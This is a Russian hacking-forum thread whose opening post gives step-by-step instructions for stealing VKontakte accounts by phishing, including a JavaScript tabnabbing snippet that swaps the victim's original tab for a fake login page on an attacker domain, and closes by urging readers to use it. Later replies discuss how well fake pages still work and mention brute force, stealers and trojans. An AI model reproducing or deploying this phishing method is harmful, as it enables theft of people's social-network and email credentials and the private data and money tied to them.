• Уменьшение отступа

    Обратная связь

    (info@ru-sfera.pw)

Информация Взлом вконтакте, почта и т.д. Как это делают !


X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 174
Немного копипасты с bhf.su:

2 дня назад увидел пару человек , которые предоставляют услуги по взлому аккаунтов в социальной сети ВКонтакте.

Я решил провести тест , и не пожалев денег заказал услугу по взлому собственной страницы.

Человек добавил меня , и скинул ссылку якобы на мою фотографию (домен был не бесплатный) , я перешёл и увидел что родительская вкладка была заменена на фейковую , и после чего мне выдало окно авторизации ВКонтакте.

Здесь все становиться ясно , и ниже я если можно так сказать "солью" способ взлома.

------------------------------------------------------------------------------------

1. Регистрируем любой хостинг аккаунт (можно и с бесплатным доменом).

2. Далее закидаем фейковую страницу в корень , и после чего создаем файл window.htm (можете использовать любое название).

3. Открываем наш только созданный файл через редактор , и пишем следующий код:


Код:
<html>
<head>
<title></title>
</head>
<body>
<script language="JavaScript">
   if(parent.window.opener) parent.window.opener.location.replace("http://fent.in"); // Ссылка на фейк.
   document.location.href = "http://fent.in"; // Ссылка для отводки глаз жертвы.
</script>
</body>
</html>

Готово ! По данному принципу работает множество "взломщиков". Пользуемся !
 

Rufus

Уважаемый пользователь
Форумчанин
Регистрация
14.12.2014
Сообщения
247
Репутация
114
Jabber
Этот способ прокатит лишь с полными "вконтактещиками",которые дальше группы "Весёлые картинки" никуда не ходили.Эра фейков уже ушла(но не для всех).
Даже если не смотреть в адресную строку и хранить пароли в браузере (что тоже небезопасно),то браузер никогда не введёт данные на фейковой страничке.Это сделает сам юзер.Ведь пароль у него простой ("штопнизабыть") и пользуется им он и для почты и для инстаграмма,где хранит свои интимные селфи.
А на замечание,мол ломанут же,долбоюзер неизменно отвечает:"А кому я нужен?Мине скрывать нечего.".
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 174
Эра фейков уже ушла(но не для всех).
Ну незнаю, многие именно так и ломают, через фейки или трояны, если например юзер использует маил-агент...

А вообще большинство "взломщиков" чем-то таким экстроординарным и необладают, всё банально брут, фейк, может-быть какой-то простенький стиллер/троян и внимание стоит это всё не менее 6000 рублей !Dmeh-Smeh-Smeh!!!

Хотя тоже труд, но не совсеми подойдёт согласен, вообще взлом мыла может хорошо скомпроментировать, вот например на мыло может-быть привязан кошелёк, или какая-нить конфиденциальная инфа...

Страничку если ломанут, то там наверное только если любовная переписка может быть, навряд-ли так критично как почта, хотя если группу компании если взломать или какое-то публичное лицо то-да можно скомпроментировать то-же...Не въехал!!!
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 174
В

Ванесса

Гость
Ну почему если девушка задаёт вопрос на форуме,над ней начинают прикалываться?Вы считаете нас глупыми?
Да половина местного мужского населения и двух слов связать не может,а считают себя умниками..
 

olegscorpion

Пользователь
Форумчанин
Регистрация
21.10.2015
Сообщения
1
Ну почему если девушка задаёт вопрос на форуме,над ней начинают прикалываться?Вы считаете нас глупыми?
Да половина местного мужского населения и двух слов связать не может,а считают себя умниками..
Молодец поддерживаю
 

Platon666

Уважаемый пользователь
Форумчанин
Регистрация
14.08.2014
Сообщения
61
Репутация
29
Jabber
Фейки еще актуальны,все зависит от грамотности жертвы и СИ. Было дело наблюдал по RMS,как чел разводил на фейк (vk) достаточно успешно,но при этом не обращал внимание на процессы в своем компе My mind
 
Верх Низ